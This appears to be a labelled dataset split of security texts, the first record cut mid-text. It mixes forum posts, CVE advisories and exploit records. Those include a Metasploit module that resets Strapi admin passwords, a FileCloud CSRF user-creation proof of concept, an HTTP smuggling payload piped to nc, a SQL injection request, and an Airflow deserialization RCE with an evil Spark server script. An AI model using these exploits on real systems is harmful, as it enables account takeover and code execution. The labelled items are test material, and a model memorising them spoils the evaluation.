induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN).\n\nPayload\nAn example of the HTTP request \"https://example.com/cmd ?\ncmd=connect&wscompression=true&destAddr=domain.com \n&scraper=fmx&screenWidth=1918&screenHeight=934&fitmode=0&argumentsp=&orientation=0&browserWidth=191\n8&browserHeight=872&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supp\nortsFullScreen=true&webapp=false”\n\nWhere \"domain.com \" is the external endpoint to be requested.\n\nVulnerable versions\nIt has been tested in VirtualUI version 2.1.28.0, 2.1.32.1 and 2.5.26.2\n\nReferences\nhttps://github.com/cybelesoft/virtualui/issues/3 \nhttps://www.tenable.com/cve/CVE-2021-46354 \nhttps://twitter.com/danielmofer ", "source": "exploitdb", "timestamp": "2022-02-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9a309ad2969b826d0fbd", "text": "[Open Redirect] CVE-2022-45402: Apache Airflow: Open redirect during login\n\nIn Apache Airflow versions prior to 2.4.3, there was an open redirect in the webserver's `/login` endpoint.\n\nmy initial email to `security@apache.org`:\n```\nHi,\n\nIn Apache Airflow, there is a parameter \"next\" on the Login page. And after a successful login, we're redirected to this parameter's value. \nI see there are some preventions for the open redirect bug. However, I can bypass these preventions using \"/\\google.com\"\n\nIt seems this parameter accepts anything after the slash \"/\" character. And, browsers parse \"/\\\" as \"http://\" in the location header.\n\nFor reproducing, you can try to login on the http://127.0.0.1:8080/login/?next=/\\google.com\n\nI tested this bug in the last version (v2.4.2)\n\nRegards,\nBugra Eskici\n```\n\nHere is the email thread:\n{█████████}\n\n## Impact\n\nUnvalidated URL redirection during login, can be used for phishing, etc.\n\nRegards,\nBugra", "source": "hackerone", "timestamp": "2022-12-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "82f5a672db59b5453e5a", "text": "I have added the correct url where the ipaddress mentioned is the one which corresponds to the tun0 on my local machine , but still on hitting the url no events are generated", "source": "hackthebox", "timestamp": "2023-12-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e765633c2c8d8dc53207", "text": "Easter Bunny hide message\n\nhello friends i am trying to solve the easter bunny machine but i couldn’t solve it can you help me?", "source": "hackthebox", "timestamp": "2023-01-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a1e5bbb3e52c018c8e42", "text": "Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)\n\n##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core'\n\nclass MetasploitModule < Msf::Auxiliary\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n\n 'Name' => \"Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)\",\n 'Description' => %q{\n This exploit module abuses the mishandling of password reset in JSON for Strapi CMS version 3.0.0-beta.17.4 to change the password of a privileged user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'WackyH4cker' ],\n 'References' =>\n [\n [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ]\n ],\n 'Platform' => 'linux',\n 'Targets' => [\n [ 'Strapi 3.0.0-beta-17.4', {} ]\n ],\n 'Payload' => '',\n 'Privileged' => true,\n 'DisclosureDate' => \"\",\n 'DefaultOptions' =>\n {\n 'SSL' => 'False',\n 'RPORT' => 80,\n },\n 'DefaultTarget' => 0\n\n ))\n\n register_options [\n OptString.new('NEW_PASSWORD', [true, 'New password for user Admin'])\n ]\n end\n\n def check\n\n res = send_request_raw({ 'uri' => '/admin/init' })\n version = JSON.parse(res.body)\n\n if version[\"data\"][\"strapiVersion\"] == '3.0.0-beta.17.4'\n return Exploit::CheckCode::Vulnerable\n else\n return Exploit::CheckCode::Safe\n end\n\n end\n\n def run\n\n json_body = { 'code' => {'$gt' => 0},\n 'password' => datastore['NEW_PASSWORD'],\n 'passwordConfirmation' => datastore['NEW_PASSWORD'] }\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => '/admin/auth/reset-password',\n 'ctype' => 'application/json',\n 'data' => JSON.generate(json_body)\n })\n\n print_status(\"Changing password...\")\n json_format = JSON.parse(res.body)\n jwt = json_format['jwt']\n\n if res.code == 200\n print_good(\"Password changed successfully!\")\n print_good(\"USER: admin\")\n print_good(\"PASSWORD: #{datastore['NEW_PASSWORD']}\")\n print_good(\"JWT: #{jwt}\")\n else\n fail_with(Failure::NoAccess\"Could not change admin user password\")\n end\n end\n\nend", "source": "exploitdb", "timestamp": "2022-02-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5646402319d8d662c59c", "text": "FileCloud 21.2 - Cross-Site Request Forgery (CSRF)\n\n# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)\n# Date: 2022-02-20\n# Exploit Author: Masashi Fujiwara\n# Vendor Homepage: https://www.filecloud.com/\n# Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2\n# Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447)\n# Tested on:\n# OS: Ubuntu 18.04.6 LTS (Docker)\n# Apache: 2.4.52\n# FileCloud: 21.2.4.17315\n# CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)\n\n# Conditions\n1. Only vulnerable if cookies have samesite set to None (SameSite=None).\n echo 'define(\"TONIDOCLOUD_COOKIE_SAME_SITE_TYPE\", \"None\");' >> /var/www/html/config/cloudconfig.php\n2. Use https as target url (When cookies set SameSite=None, also set Secure).\n\n# PoC (HTML)\n\n\n\n\n\n\n\n\nCSRF PoC for CVE-2022-25241\n\nCreat hacker user with Password1 via CSV file upload.\n\n\n\n\n\n# HTTPS Request\nPOST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1\nHost: 192.168.159.129:8443\nCookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493\nContent-Length: 365\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW\nConnection: close\n\n------WebKitFormBoundaryiAXsUsJ2ZV54DFuW\nContent-Disposition: form-data; name=\"uploadFormElement\"; filename=\"user.csv\"\nContent-Type: application/vnd.ms-excel\n\nUserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n\n------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--\n\n\n\n# CSV file format\nUserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES", "source": "exploitdb", "timestamp": "2022-02-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f08b78bb01e226e9406f", "text": "CVE: CVE-2022-2066\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository neorazorx/facturascripts prior to 2022.06.'}]\n\nFix commit: Sanitized username when showing user not found message.\n------\nSaneado nombre de usuario al mostrar el mensaje de usuario no encontrado.", "source": "cvefixes", "timestamp": "2022-06-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3470a9fe061d1bf85319", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d111194cfe5825475463", "text": "The salary of a certified ethical hacker can vary depending on various factors such as the level of experience, the location, the industry, and the organization they work for. It's important to note that these figures are just estimates, and the actual salary can be higher or lower based on the factors mentioned above. Additionally, obtaining certification alone does not guarantee a certain salary. Salary negotiations and career progression depend on many other factors, including experience, performance, and the job market demand for the skills of the ethical hacker.", "source": "go4expert", "timestamp": "2023-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1280e3bca6ae8e63f15b", "text": "ok used cupp and now i think ill have a better chance, like the others said, follow the modules curriculum and dont be scared of it", "source": "hackthebox", "timestamp": "2023-04-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "35bda27b863a0f98c6f5", "text": "CVE: CVE-2022-2353\n\n[{'lang': 'en', 'value': 'Prior to microweber/microweber v1.2.20, due to improper neutralization of input, an attacker can steal tokens to perform cross-site request forgery, fetch contents from same-site and redirect a user.'}]\n\nFix commit: update", "source": "cvefixes", "timestamp": "2022-07-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6a7b26a73641f8bc7fe7", "text": "nftables binding to an already bound chain\n\n[Severity: MEDIUM]\n\n### Impact\nAn issue was discovered in net/netfilter/nf_tables_api.c in the Linux kernel. A denial of service can occur upon binding to an already bound chain.\n\nAffected by this vulnerability is the function nft_verdict_init of the file net/netfilter/nf_tables_api.c. The manipulation with an unknown input leads to a denial of service vulnerability. The program does not release or incorrectly releases a resource before it is made available for re-use.\n\n### Patches\nThe fix has been backported to [5.15.64](https://www.linuxkernelcves.com/cves/CVE-2022-39190) version of the upstream Linux kernel (5.15 is the upstream Kernel long term version Talos ships with). Talos >= v1.2.0 is shipped with Linux Kernel 5.15.64 fixing the above issue.\n\n### Workarounds\nIt's recommended to upgrade\n\n### References\n- https://www.sesin.at/2022/09/02/cve-2022-39190-linux-kernel-up-to-5-19-5-nf_tables_api-c-nft_verdict_init-denial-of-service/\n- https://nvd.nist.gov/vuln/detail/CVE-2022-39190\n\n### For more information\n- Email us at [security@siderolabs.com](mailto:security@siderolabs.com)", "source": "github_advisory", "timestamp": "2022-09-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "30367c77b75ea692e7ea", "text": "From Docker to Docker connection\n\nVB - Kali VB - Ubuntu - Docker JuiceShop Kali can ping Ubuntu, JuiceShop can ping Kali How can I access from Kali to JuiceShop with tools like nmap, etc. If I setup Docker in Kali and have tools inside, how can I access from nmap in Docker(Kali) to JuiceShop in Docker(Ubuntu)?", "source": "hackersploit", "timestamp": "2022-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7520d5a0dfcf59ca3fa3", "text": "Exploiting File Upload Vulnerability with image srce being data://\n\nHi there, every now and then I stumble over web apps that are based on JavaScript / JSON frameworks. There is a functionality to upload images, which I can bypass to upload a shell or other file types. However, when displaying the image via the web app, the image is embedded usually in the following way: Do you see any way to exploit this anyway? So far, I have been capturing the HTTP requests to check from which directory the file has been pulled from and try to access the file directly from there.", "source": "hackersploit", "timestamp": "2022-12-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5ed9b39eab1c472d9bee", "text": "it gave you the wrong version. I have had that happen to me on the mtu question. you are looking for version 4.15.0", "source": "hackthebox", "timestamp": "2022-12-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d83b783d5f53fb64b462", "text": "Not that it is any of my business, but from the git repo README.md: \" hcxdumptool/hcxtools is NOT recommended to be used by unexperienced users or newbees. If you are not familiar with Linux generally or if you do not have at least a basic level of knowledge as mentioned in section “Requirements”, hcxdumptool/hcxtools is probably not what you are looking for. \" Having said that, can I ask if you have used the default installed version? Can you tell me anything about the feature difference between the default version and the one you are trying to use so I can better understand what it is you are trying to do? For example, are you actually typing “wl xxx ” or are you simply not sharing the specific interface identifier of the wireless interface for privacy reasons? If it is the former, I think I have an easy solution for you…", "source": "parrotsec", "timestamp": "2023-11-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "55397841b1ea5e7c334d", "text": "Prototype pollution in matrix-js-sdk (part 2)\n\n[Severity: HIGH]\n\n### Impact\n\nIn certain configurations, data sent by remote servers containing special strings in key locations could cause modifications of the `Object.prototype`, disrupting matrix-js-sdk functionality, causing denial of service and potentially affecting program logic.\n\n(This is part 2, where [CVE-2022-36059](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36059) / [GHSA-rfv9-x7hh-xc32](https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-rfv9-x7hh-xc32) is part 1. Part 2 covers remaining vectors not covered by part 1, found in a codebase audit scheduled after part 1.)\n\n### Patches\nThe issue has been patched in matrix-js-sdk 24.0.0.\n\n### Workarounds\nNone.\n\n### References\n\n- [Release blog post](https://matrix.org/blog/2023/03/28/security-releases-matrix-js-sdk-24-0-0-and-matrix-react-sdk-3-69-0)\n- The advisory [GHSA-rfv9-x7hh-xc32](https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-rfv9-x7hh-xc32) ([CVE-2022-36059](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36059)) refers to an initial set of vulnerable locations discovered and patched in matrix-js-sdk 19.4.0. We opted not to disclose that advisory while we performed an audit of the codebase and are now disclosing it jointly with this one.\n\n### For more information\nIf you have any questions or comments about this advisory please email us at [security at matrix.org](mailto:security@matrix.org).\n", "source": "github_advisory", "timestamp": "2023-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "255167470e7695605a95", "text": ".NET Denial of Service Vulnerability\n\n[Severity: HIGH]\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 6.0, .NET 5.0, and .NET CORE 3.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nMicrosoft is aware of a Denial of Service vulnerability, which exists in .NET 6.0, .NET 5.0, and .NET CORE 3.1 when parsing certain types of http form requests.\n\n### Affected Software\n\n* Any .NET 6.0 application running on .NET 6.0.2 or lower\n* Any .NET 5.0 application running on .NET 5.0.14 or lower\n* Any .NET Core 3.1 application running on .NET Core 3.1.22 or lower \n\n### Patches\nTo fix the issue, please install the latest version of .NET 6.0 or .NET 5.0 or .NET Core 3.1.. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n\n* If you're using .NET Core 6.0, you should download and install Runtime 6.0.3 or SDK 6.0.201 (for Visual Studio 2022 v17.1) from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n\n* If you're using .NET 5.0, you should download and install Runtime 5.0.15 or SDK 5.0.406 (for Visual Studio 2019 v16.11) or SDK 5.0.212 (for Visual Studio 2011 v16.9) from https://dotnet.microsoft.com/download/dotnet-core/5.0.\n\n* If you're using .NET Core 3.1, you should download and install Runtime 3.1.23 or SDK 3.1.417 (for Visual Studio 2019 v16.7.26) from https://dotnet.microsoft.com/download/dotnet-core/5.0.\n.NET 6.0 and .NET 5.0 updates are also available from Microsoft Update. To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.\n\n.NET 6.0 and .NET 5.0 and, .NET Core 3.1 updates are also available from Microsoft Update. To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.\n\n#### Other Details\n\n- Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/212\n- An Issue for this can be found at https://github.com/dotnet/aspnetcore/issues/40598\n- MSRC details for this can be found at https://msrc.microsoft.com/update-guide/en-US/vulnerability/ CVE-2022-24464", "source": "github_advisory", "timestamp": "2022-10-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e805d9e8abd7dea0bd4b", "text": "Nmap | Convert MACs of hosts discovered over IPv4 into IPv6 Link-Local addresses.\n\nI was trying to perform conversion of obtained mac addresses from ipv4 scan to ipv6 link-local addresses in nmap, but as it seems, theres no such parameter to do that within nmap. MY QUESTION: Does nmap has such “parameter” to convert mac addresses to ipv6 link-local addresses within the same nmap query without piping to other tools?", "source": "hackersploit", "timestamp": "2022-05-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "38dd1275c2ddac661db1", "text": "Thanks Proper ffuf flags were something that I was missing for long.", "source": "hackthebox", "timestamp": "2023-07-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "38046cbc5122b17156df", "text": "CVE: CVE-2022-0752\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository hestiacp/hestiacp prior to 1.5.9.'}]\n\nFix commit: Fix XXS issues (#2432)\n\n* XSS patches\r\n\r\n* Reslove XSS vulnrebilty\r\n\r\n* Resolve XSS vulnrebility\r\n\r\n* Prevent showing edit form from non exsiting records\r\n\r\n* Improve error handling message\r\n\r\nCreate a function\r\n\r\n* Make sure $user from $_SESSION is escapeshellarg\r\n\r\nPrevent double escapeshellarg in Edit/web/index\r\n\r\n* Enable translateable errors in /inc/main.php\r\n\r\nFix \"White\" screen issue when trying to loginas non existing user\r\n\r\n* Prevent double escapeshellarg()\r\n\r\n* Do not remove unset($output)\r\n\r\n* Resolve linting errors", "source": "cvefixes", "timestamp": "2022-03-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d44e2d6dc8a02ce90741", "text": "[HTTP Request Smuggling] HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding (improper fix for CVE-2022-32215)\n\n**Summary:**\nDue to an incomplete fix for CVE-2022-32215, the `llhttp` parser in the `http` module in Node v16.16.0 and 18.7.0 still does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).\n\n**Description:** [add more details about this vulnerability]\n\nWe have identified that the root issue of CVE-2022-32215 (that was [reported here](https://hackerone.com/reports/1501679)) was seemingly not fixed at all. Running the same exploit produces the same unwanted result. For the sake of brevity, I won't repeat the description, it can be seen in the [original issue](https://hackerone.com/reports/1501679). \n\n## Steps To Reproduce:\n\nThe reproduction steps are the same from the original issue\n\n#### Testing Server\n\nRun the following server (`node server.js`):\n```js\nconst http = require('http');\n\nhttp.createServer((request, response) => {\n let body = [];\n request.on('error', (err) => {\n response.end(\"error while reading body: \" + err)\n }).on('data', (chunk) => {\n body.push(chunk);\n }).on('end', () => {\n body = Buffer.concat(body).toString();\n \n response.on('error', (err) => {\n response.end(\"error while sending response: \" + err)\n });\n\n response.end(JSON.stringify({\n \"Headers\": request.headers,\n \"Length\": body.length,\n \"Body\": body,\n }) + \"\\n\");\n });\n}).listen(80);\n```\n\n#### Payload\n\n```\nprintf \"POST / HTTP/1.1\\r\\n\"\\\n\"Host: 127.0.0.1\\r\\n\"\\\n\"Transfer-Encoding: chunked\\r\\n\"\\\n\" , chunked-false\\r\\n\"\\\n\"\\r\\n\"\\\n\"1\\r\\n\"\\\n\"A\\r\\n\"\\\n\"0\\r\\n\"\\\n\"\\r\\n\"\\\n\"GET /flag HTTP/1.1\\r\\n\"\\\n\"Host: 127.0.0.1\\r\\n\"\\\n\"foo: x\\r\\n\"\\\n\"\\r\\n\"\\\n\"\\r\\n\" | nc localhost 80\n```\n\n#### Output\n\n```\nHTTP/1.1 200 OK\nDate: Sun, 06 Mar 2022 03:34:05 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\nContent-Length: 101\n\n{\"Headers\":{\"transfer-encoding\":\"chunked , chunked-false\"},\"Length\":1,\"Body\":\"A\"}\nHTTP/1.1 200 OK\nDate: Sun, 06 Mar 2022 03:34:05 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\nContent-Length: 64\n\n{\"Headers\":{\"host\":\"127.0.0.1\", \"foo\":\"x\"},\"Length\":0,\"Body\":\"\"}\n```\n\nAs you can see, the payload was parsed as two requests (POST to / , and GET to /flag) which is erroneous behavior (the first request was parsed as a chunked request, which is wrong)\n\nThe expected output should be -\n```\nHTTP/1.1 400 Bad Request\nConnection: close\n```\n\n## Supporting Material/References:\n\nExploitation of the issue on Node 16.16.0 -\n{F1861233}\n\n## Credit\n\nThe vulnerability was discovered by Liav Gutman of the JFrog CSO Team\n\n## Impact\n\nDepending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on.", "source": "hackerone", "timestamp": "2022-10-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0ca8fdfab9e151821d5f", "text": "EQ Enterprise management system v2.2.0 - SQL Injection\n\nExploit Title: EQ Enterprise management system v2.2.0 - SQL Injection\nDate: 2022.12.7\nExploit Author: TLF\nVendor Homepage: https://www.yiquantech.com/pc/about.html\nSoftware Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/\nVersion: EQ v1.5.31 to v2.2.0\nTested on: windows 10\nCVE : CVE-2022-45297\n\n\nPOC:\nPOST /Account/Login HTTP/1.1\nHost: 121.8.146.131\nUser-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\nContent-Length: 118\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nContent-Type: application/x-www-form-urlencoded;\ncharset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg\nOrigin: http://121.8.146.131\nReferer: http://121.8.146.131/Account/Login\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip\nRememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27", "source": "exploitdb", "timestamp": "2023-03-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ff79e72c564bdcb0ffd7", "text": "I don’t really have a comprehensive list of TTPs for AD, however, I would recommend starting here: Techniques - Enterprise | MITRE ATT&CK® You can also check out the Windows matrice here: Matrix - Enterprise | MITRE ATT&CK®", "source": "hackersploit", "timestamp": "2022-03-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "69130c5832c6ad907392", "text": "So I did it, but I don’t know exactly which command was the one that worked. The flag.txt only appeared on the /tmp webpage after refreshing it. At the time I was trying another method using Burp to capture the packet(s) when copying and/or moving a document to the main page after it was moved to the /tmp page. Moving any document back to the main page caused the ‘malicious request denied’ message alert, but it did allow the document to be copied to the main page if it had originally been moved to /tmp. I also get the following message alerts a lot: “bash: /flag.txt: Permission denied”, and the \"Error while moving: mv: missing destination file operand after ‘/var/www/html/files/’ \". I’ve mainly been using the ||, && methods, but have tried various other URL-Encoded characters, and also injecting the input in the middle of the command rather than at the end, but all to no avail. If anyone is able to point me in the right direction, I would greatly appreciate it! Also, PM me if you want to exchange more detailed methods/ideas that we shouldn’t post here.", "source": "hackthebox", "timestamp": "2022-07-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "391ff5f71118e3e270bc", "text": "cheekychimp: essential for step 5 - some of these tas Hey I got some problems to find where Flag4, I managed to log into the /manager page, but I can’t find the credentials for the user t****t and got no ideas where to go from where on", "source": "hackthebox", "timestamp": "2022-11-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c7a1fd04ce4289fd0b64", "text": "CVE: CVE-2021-23470\n\n[{'lang': 'en', 'value': 'This affects the package putil-merge before 3.8.0. The merge() function does not check the values passed into the argument. An attacker can supply a malicious value by adjusting the value to include the constructor property. Note: This vulnerability derives from an incomplete fix in https://security.snyk.io/vuln/SNYK-JS-PUTILMERGE-1317077'}]\n\nFix commit: Fixed Prototype Pollution vulnerability (constructor). Thanks to Gill from Snyk Security", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "75beb9b7434366dcb8af", "text": "[Deserialization of Untrusted Data] CVE-2023-40195: Apache Airflow Spark Provider Deserialization Vulnerability RCE\n\nApache Airflow Spark Provider. After the malicious Spark server address is configured through the connections of the Airflow UI interface, attackers exploit malicious servers to manipulate pyspark clients through malicious deserialization data. So as to implement RCE attack on airflow server.\n\n##Vulnerability principle:\n\n1. Analyze spark principle: Spark protocol is based on RPC communication. The RPC communication process is a serialization and deserialization process, Therefore, attackers can call arbitrary java methods through deserialization, implement RCE.\n\n2.Spark can attack the server through malicious client deserialization, and can also attack the client through malicious server; In the Airflow scenario, PySpark is used as a client to connect to the Spark Server through Spark Provider. So, an attacker only needs to construct a malicious server to attack Airflow's Spark client.\n\nThe command that triggers deserialization is as follows:\n**spark-submit --master spark://evil_ip:port**\nTherefore, an attacker can configure malicious ip and port through the connections of the Airflow UI. And to execute the above command, then trigger the deserialization operation.\n\n##Vulnerability exploitation process:\n\n1. Create a new ‘Spark’ connection is named ‘spark_default’,and configure the Port and Host parameter.\nHost: spark://172.31.76.174\nPort: 8888\n\n###172.31.76.174 is malicious spark server address for attackers\n\n\n(F2648714)\n\n{F2648715}\n\n2.Attackers generate malicious deserialized data (exp.der) through the deserialization tool ysoserial. \n**Tool URL: https://github.com/frohoff/ysoserial**\nThe attacker locally executes the following commands:\n**\"C:\\Program Files\\Java\\jre1.8.0_361\\bin\\java\" -jar ysoserial.jar CommonsCollections4 \"touch /tmp/thisisRCE\" > exp.der**\n#touch /tmp/thisisRCE is malicious commands to be executed on airflow.\n\n{F2648716}\n\n3.The attacker starts the malicious Spark server locally and specifies the malicious deserialized data to be transmitted.\n**python2 evil_spark_server.py 8888 exp.der**\n\n{F2648717}\n\n4. Enter the DAGs menu and start hive_dag task, select “Trigger DAG w/ config”. \nhttp://localhost:8080/trigger?dag_id=example_spark_operator\n\n{F2648718}\n\n4. The final command is as follows:\n\n**spark-submit --master spark://172.31.76.174:8888 --name arrow-spark /tmp/file**\nThrough the log and server view, it can be seen that any command has been executed successfully.\n\n{F2648719}\n\nThe malicious server successfully accepted the request and sent malicious data.\n\n{F2648720}\n\nSuccessfully executed malicious commands on Airflow Worker Server.\n\n{F2648722}\n\n**evil_spark_server.py**\n```\n#!/usr/bin/python\nimport socket\nimport os\nimport sys\nimport struct\n\nfrom SocketServer import BaseRequestHandler, ThreadingTCPServer\n\nclass EchoHandler(BaseRequestHandler):\n def handle(self):\n print 'Got connection from %s'%(str(self.client_address))\n while True:\n msg = self.request.recv(8192)\n print msg\n if not msg:\n break\n if len(msg) > 16:\n print \"Send msg>>>\"\n self.request.send(build_msg(msg[9:17]))\n\ndef build_msg(request_id):\n payloadObj = open(sys.argv[2],'rb').read()\n msg_type = '\\x04'\n head_length = 21\n msg = struct.pack('>Q',len(payloadObj) + 21) + msg_type + request_id\n msg += struct.pack('>I',len(payloadObj)) + payloadObj\n return msg\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print 'Usage: python %s ' % os.path.basename(sys.argv[0])\n sys.exit()\n serv = ThreadingTCPServer(('0.0.0.0', int(sys.argv[1])), EchoHandler)\n print \"Server listening on 0.0.0.0:%s\"%(sys.argv[1])\n serv.serve_forever()\n```\n\n**DAG Demo(example_spark.py):**\n```\nfrom datetime import datetime\n\nfrom airflow.models import DAG\nfrom airflow.providers.apache.spark.operators.spark_jdbc import SparkJDBCOperator\nfrom airflow.providers.apache.spark.operators.spark_sql impo", "source": "hackerone", "timestamp": "2023-09-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}